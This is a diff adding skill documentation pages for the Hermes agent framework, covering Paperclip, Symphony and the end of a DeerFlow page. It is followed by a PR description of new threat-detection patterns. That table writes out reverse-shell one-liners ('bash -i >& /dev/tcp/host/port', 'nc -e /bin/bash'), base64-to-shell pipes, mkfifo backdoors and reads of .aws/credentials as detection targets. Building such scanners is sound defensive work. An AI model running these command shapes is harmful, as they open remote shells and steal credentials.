+- Keep task ownership clear: Hermes local workflow vs DeerFlow harness.
+
+## Hermes Adoption Target
+
+The worthwhile adoption surface is conceptual:
+
+- sandbox boundaries for long-running tasks
+- explicit separation between operator, worker, and memory concerns
+- optional long-horizon harness patterns for users who want a separate runtime
+
+Do not expand Hermes core just to imitate DeerFlow's all-in-one platform shape.
+
+## Verification
+
+Use the exact upstream validation steps from the checked-out repo or install guide. When Docker is used, prefer container health and the documented app startup checks. For source installs, at minimum run the repo's test/build commands before claiming success.
+
+## Pitfalls
+
+- Local-host execution without proper sandboxing is not a safe replacement for container isolation.
+- DeerFlow is a broad platform; avoid partial installs that leave memory, sandbox, and UI assumptions broken.
+- It is easy to duplicate features Hermes already has; only choose it when the user explicitly wants DeerFlow's runtime model.
+
+## Related
+
+- Upstream: https://github.com/bytedance/deer-flow
+- Install guide: https://raw.githubusercontent.com/bytedance/deer-flow/main/Install.md

--- a/website/docs/user-guide/skills/optional/autonomous-ai-agents/autonomous-ai-agents-paperclip.md
+++ b/website/docs/user-guide/skills/optional/autonomous-ai-agents/autonomous-ai-agents-paperclip.md
@@ -1,0 +1,112 @@
+---
+title: "Paperclip"
+sidebar_label: "Paperclip"
+description: "Use Paperclip as an external company-style control plane for teams of agents, budgets, heartbeats, and governance"
+---
+
+{/* This page is auto-generated from the skill's SKILL.md by website/scripts/generate-skill-docs.py. Edit the source SKILL.md, not this page. */}
+
+# Paperclip
+
+Use Paperclip as an external company-style control plane for teams of agents, budgets, heartbeats, and governance. Best when the user wants persistent multi-agent operations, not just one-off delegation.
+
+## Skill metadata
+
+| | |
+|---|---|
+| Source | Optional — install with `hermes skills install official/autonomous-ai-agents/paperclip` |
+| Path | `optional-skills/autonomous-ai-agents/paperclip` |
+| Version | `0.1.0` |
+| Author | Hermes Agent |
+| License | MIT |
+| Platforms | linux, macos, windows |
+| Tags | `Paperclip`, `Agent-Company`, `Budgets`, `Governance`, `Heartbeats`, `Dashboard` |
+| Related skills | [`hermes-agent`](/docs/user-guide/skills/bundled/autonomous-ai-agents/autonomous-ai-agents-hermes-agent), [`subagent-driven-development`](/docs/user-guide/skills/optional/software-development/software-development-subagent-driven-development), [`watchers`](/docs/user-guide/skills/optional/devops/devops-watchers) |
+
+## Reference: full SKILL.md
+
+:::info
+The following is the complete skill definition that Hermes loads when this skill is triggered. This is what the agent sees as instructions when the skill is active.
+:::
+
+# Paperclip
+
+Use [Paperclip](https://github.com/paperclipai/paperclip) when the user wants a persistent operations layer for teams of agents: org charts, budgets, scheduled heartbeats, approvals, and dashboards. Hermes can help install, inspect, and integrate it, but Paperclip should remain an external system rather than be folded into Hermes core.
+
+## When to Use
+
+- The user wants long-lived agent teams with roles and reporting lines.
+- Budgets, approvals, and governance matter.
+- Agents should wake up on schedules or heartbeats.
+- The user wants a web app to manage work at the company level.
+
+Prefer Hermes `delegate_task` or cron for smaller local automation. Use Paperclip when the orchestration scope is organization-wide.
+
+## Prerequisites
+
+- Node.js 20+
+- pnpm 9.15+
+- Browser for the UI
+
+## Quickstart
+
+Paperclip's upstream quickstart is:
+
+```bash
+terminal(command="npx --registry https://registry.npmjs.org paperclipai onboard --yes", timeout=900, pty=true)
+```
+
+The explicit npm registry avoids failures on machines pointed at private registries.
+
+For LAN or tailnet binding, upstream supports:
+
+```bash
+terminal(command="npx --registry https://registry.npmjs.org paperclipai onboard --yes --bind lan", timeout=900, pty=true)
+terminal(command="npx --registry https://registry.npmjs.org paperclipai onboard --yes --bind tailnet", timeout=900, pty=true)
+```
+
+## Local Development
+
+```bash
+terminal(command="git clone https://github.com/paperclipai/paperclip.git", workdir="/tmp")
+terminal(command="pnpm install", workdir="/tmp/paperclip", timeout=900)
+terminal(command="pnpm dev", workdir="/tmp/paperclip", background=true, notify_on_complete=true)
+```
+
+## Hermes Adoption Target
+
+Adopt the governance ideas selectively:
+
+- budgets and approvals are useful design input for future workflow guardrails
+- heartbeats and org-chart management should stay in Paperclip, not Hermes core
+- Hermes can act as a worker, reviewer, or bootstrapper inside a Paperclip-managed system
+- avoid duplicating Paperclip's company-control-plane concepts in native Hermes memory or cron primitives
+
+## Verification
+
+Upstream verification commands:
+
+```bash
+terminal(command="pnpm build", workdir="/path/to/paperclip", timeout=900)
+terminal(command="pnpm typecheck", workdir="/path/to/paperclip", timeout=900)
+terminal(command="pnpm test", workdir="/path/to/paperclip", timeout=900)
+```
+
+## Hermes Integration Shape
+
+- Hermes can provision or inspect the Paperclip repo.
+- Hermes can draft policies, role prompts, and operating procedures.
+- Hermes should not mirror Paperclip's org chart, budget, or heartbeat engine into core memory/tools.
+- If the user already runs Paperclip, Hermes can operate as one worker in that larger system.
+
+## Pitfalls
+
+- Paperclip is a full product, not a drop-in library.
+- Budget/governance settings can create surprising no-op behavior if left unset.
+- Treat mobile/web access and exposed binds as security-sensitive.
+- Avoid duplicating the same schedules in both Paperclip and Hermes cron unless the owner is explicit.
+
+## Related
+
+- Upstream: https://github.com/paperclipai/paperclip
+- Docs: https://github.com/paperclipai/paperclip-docs

--- a/website/docs/user-guide/skills/optional/autonomous-ai-agents/autonomous-ai-agents-symphony.md
+++ b/website/docs/user-guide/skills/optional/autonomous-ai-agents/autonomous-ai-agents-symphony.md
@@ -1,0 +1,93 @@
+---
+title: "Symphony"
+sidebar_label: "Symphony"
+description: "Use OpenAI Symphony as an external work-management layer that turns tracker items into isolated autonomous implementation runs with proof of work"
+---
+
+{/* This page is auto-generated from the skill's SKILL.md by website/scripts/generate-skill-docs.py. Edit the source SKILL.md, not this page. */}
+
+# Symphony
+
+Use OpenAI Symphony as an external work-management layer that turns tracker items into isolated autonomous implementation runs with proof of work.
+
+## Skill metadata
+
+| | |
+|---|---|
+| Source | Optional — install with `hermes skills install official/autonomous-ai-agents/symphony` |
+| Path | `optional-skills/autonomous-ai-agents/symphony` |
+| Version | `0.1.0` |
+| Author | Hermes Agent |
+| License | MIT |
+| Platforms | linux, macos |
+| Tags | `Symphony`, `Work-Management`, `Linear`, `Autonomous-Runs`, `Proof-of-Work` |
+| Related skills | [`hermes-agent`](/docs/user-guide/skills/bundled/autonomous-ai-agents/autonomous-ai-agents-hermes-agent), [`subagent-driven-development`](/docs/user-guide/skills/optional/software-development/software-development-subagent-driven-development), `using-git-worktrees` |
+
+## Reference: full SKILL.md
+
+:::info
+The following is the complete skill definition that Hermes loads when this skill is triggered. This is what the agent sees as instructions when the skill is active.
+:::
+
+# Symphony
+
+Use [OpenAI Symphony](https://github.com/openai/symphony) when the user wants work items from a tracker such as Linear turned into isolated autonomous implementation runs with attached proof of work. Symphony is explicitly a low-key engineering preview and should be treated as an external system or design reference, not something to merge into Hermes core.
+
+## When to Use
+
+- The team wants issue-tracker-driven autonomous implementation runs.
+- The user wants proof artifacts such as CI status, PR review feedback, complexity analysis, or walkthrough evidence attached to each run.
+- The user is already adopting an external harness-engineering style workflow.
+
+Prefer Hermes-native `delegate_task`, cron, and repo workflows for local-first work. Use Symphony when the user specifically wants Symphony's work-management model.
+
+## Adoption Paths
+
+### 1. Build from the spec
+
+Symphony's repo explicitly supports implementing the system from `SPEC.md`:
+
+```text
+Implement Symphony according to the following spec: https://github.com/openai/symphony/blob/main/SPEC.md
+```
+
+### 2. Use the experimental Elixir reference implementation
+
+```text
+Set up Symphony for my repository based on https://github.com/openai/symphony/blob/main/elixir/README.md
+```
+
+## Hermes Integration Shape
+
+- Hermes can read the spec, inspect the reference implementation, and adapt ideas into repo-local workflows.
+- Hermes should not claim to be Symphony or silently recreate its entire control plane in core.
+- Good adoption targets are patterns: isolated runs, proof-of-work artifacts, tracker-driven dispatch.
+
+## Hermes Adoption Target
+
+This is primarily a pattern library for Hermes:
+
+- tracker item -> isolated run -> proof artifact is worth documenting
+- spec-first implementation guidance is useful for advanced users building their own orchestration layer
+- the preview implementation should stay external and optional
+- avoid presenting Hermes as a drop-in Symphony replacement
+
+## Verification
+
+When working with the reference implementation, use the upstream validation commands from the Elixir README. Repository summaries indicate checks such as:
+
+```bash
+terminal(command="make -C elixir all", workdir="/path/to/symphony", timeout=900)
+terminal(command="mix test", workdir="/path/to/symphony/elixir", timeout=900)
+```
+
+## Pitfalls
+
+- Symphony is marked as an engineering preview for trusted environments.
+- The spec-first nature means many users will need to implement or adapt it rather than install a polished product.
+- Do not assume a drop-in Hermes plugin exists.
+
+## Related
+
+- Upstream: https://github.com/openai/symphony
+- Spec: https://github.com/openai/symphony/blob/main/SPEC.md


### PR DESCRIPTION
## Summary

Three targeted improvements from an adversarial security + optimization pass:

### 1. `tools/threat_patterns.py` — new attack-pattern coverage

The existing pattern set had no detection for the most common shellcode delivery and post-exploitation patterns. Added (all with scope rationale matching existing conventions):

| Pattern ID | What it catches | Scope |
|---|---|---|
| `read_secrets` (extended) | Also catches `.aws/credentials` and `.config/hermes` | all |
| `b64_pipe_exec` | `base64 -d \| sh/bash/python/perl/ruby/node` — canonical obfuscation layer | all |
| `b64_echo_decode` | `echo <long_b64_blob> \| base64 -d` pipeline prolog | all |
| `mkfifo_backdoor` | `mkfifo` — first stage of named-pipe reverse shell | context |
| `reverse_shell` | `bash -i >& /dev/tcp/host/port` | all |
| `nc_shell` | `nc -e/-c /bin/bash` netcat bind/reverse shell | all |

False-positive rationale: legitimate scripts decode base64 to *files*, not directly to a shell interpreter. mkfifo is extremely rare in legitimate agent context. Reverse-shell one-liners have no legitimate agent use case.

### 2. `agent/i18n.py` + `locales/zh.yaml` + `locales/zh-hant.yaml` — restore multilingual support

`SUPPORTED_LANGUAGES` was stripped to only `"en"`, causing `_normalize_lang()` to silently fall back to English for all non-English users regardless of their `display.language` config setting. The locale YAML files (zh, zh-hant, ja, de, es, fr, tr, uk, af, ko, it, ga, pt, ru, hu) were all intact and the `_LANGUAGE_ALIASES` mapping was fully defined — the only broken piece was the lookup guard at line 152.

Also restores the deleted `zh.yaml` and `zh-hant.yaml` runtime locale files (separate from the website i18n docs being removed in a parallel branch).

### 3. `tools/memory_tool.py` — graceful `store=None` fallback

When `memory_tool()` is called without a live agent (gateway, CLI `/memory` handler, desktop GUI), `store=None` triggered an immediate hard error. Now tries `load_on_disk_store()` first so those paths work correctly when memory is enabled in config. Includes an improved, more actionable error message for the genuine-unavailable case.